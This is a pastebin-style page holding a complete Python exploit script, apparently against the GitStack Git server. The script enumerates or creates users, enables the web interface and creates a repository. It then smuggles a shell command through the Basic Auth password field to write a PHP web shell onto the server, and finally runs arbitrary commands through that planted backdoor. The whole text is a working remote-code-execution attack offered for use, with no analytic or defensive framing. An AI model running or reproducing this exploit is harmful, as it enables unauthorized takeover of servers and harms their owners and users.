SHOW:
|
|
- or go back to the newest paste.
1 | import requests | |
2 | from requests.auth import HTTPBasicAuth | |
3 | import os | |
4 | import sys | |
5 | from time import sleep | |
6 | ||
7 | ip = "localhost:8000" | |
8 | ||
9 | # What command you want to execute | |
10 | command = 'whoami' | |
11 | ||
12 | repository = 'rce' | |
13 | username = 'rce' | |
14 | password = 'rce' | |
15 | csrf_token = 'token' | |
16 | ||
17 | user_list = [] | |
18 | ||
19 | print ("[+] Get user list") | |
20 | try: | |
21 | r = requests.get("http://{}/rest/user/".format(ip)) | |
22 | user_list = r.json() | |
23 | user_list.remove('everyone') | |
24 | except: | |
25 | pass | |
26 | ||
27 | if len(user_list) > 0: | |
28 | username = user_list[0] | |
29 | print ("[+] Found user {}".format(username)) | |
30 | else: | |
31 | r = requests.post("http://{}/rest/user/".format(ip), data={'username' : username, 'password' : password}) | |
32 | print ("[+] Create user") | |
33 | ||
34 | if not "User created" in r.text and not "User already exist" in r.text: | |
35 | print ("[-] Cannot create user") | |
36 | os._exit(0) | |
37 | sleep(3) | |
38 | r = requests.get("http://{}/rest/settings/general/webinterface/".format(ip)) | |
39 | if "true" in r.text: | |
40 | print ("[+] Web repository already enabled") | |
41 | else: | |
42 | print ("[+] Enable web repository") | |
43 | r = requests.put("http://{}/rest/settings/general/webinterface/".format(ip), data='{"enabled" : "true"}') | |
44 | if not "Web interface successfully enabled" in r.text: | |
45 | print ("[-] Cannot enable web interface") | |
46 | os._exit(0) | |
47 | sleep(3) | |
48 | print ("[+] Get repositories list") | |
49 | r = requests.get("http://{}/rest/repository/".format(ip)) | |
50 | repository_list = r.json() | |
51 | ||
52 | if len(repository_list) > 0: | |
53 | repository = repository_list[0]['name'] | |
54 | print ("[+] Found repository {}".format(repository)) | |
55 | else: | |
56 | print ("[+] Create repository") | |
57 | ||
58 | r = requests.post("http://{}/rest/repository/".format(ip), cookies={'csrftoken' : csrf_token}, data={'name' : repository, 'csrfmiddlewaretoken' : csrf_token}) | |
59 | if not "The repository has been successfully created" in r.text and not "Repository already exist" in r.text: | |
60 | print ("[-] Cannot create repository") | |
61 | os._exit(0) | |
62 | sleep(3) | |
63 | print ("[+] Add user to repository") | |
64 | r = requests.post("http://{}/rest/repository/{}/user/{}/".format(ip, repository, username)) | |
65 | ||
66 | if not "added to" in r.text and not "has already" in r.text: | |
67 | print ("[-] Cannot add user to repository") | |
68 | os._exit(0) | |
69 | ||
70 | print ("[+] Disable access for anyone") | |
71 | r = requests.delete("http://{}/rest/repository/{}/user/{}/".format(ip, repository, "everyone")) | |
72 | ||
73 | if not "everyone removed from rce" in r.text and not "not in list" in r.text: | |
74 | print ("[-] Cannot remove access for anyone") | |
75 | os._exit(0) | |
76 | sleep(3) | |
77 | print ("[+] Create backdoor in PHP") | |
78 | r = requests.get('http://{}/web/index.php?p={}.git&a=summary'.format(ip, repository), auth=HTTPBasicAuth(username, 'p && echo "<?php system($_POST[\'a\']); ?>" > c:\GitStack\gitphp\exploit-saltinbank.php')) | |
79 | print (r.text.encode(sys.stdout.encoding, errors='replace')) | |
80 | sleep(3) | |
81 | print ("[+] Execute command") | |
82 | r = requests.post("http://{}/web/exploit-saltinbank.php".format(ip), data={'a' : command}) | |
83 | print (r.text.encode(sys.stdout.encoding, errors='replace')) |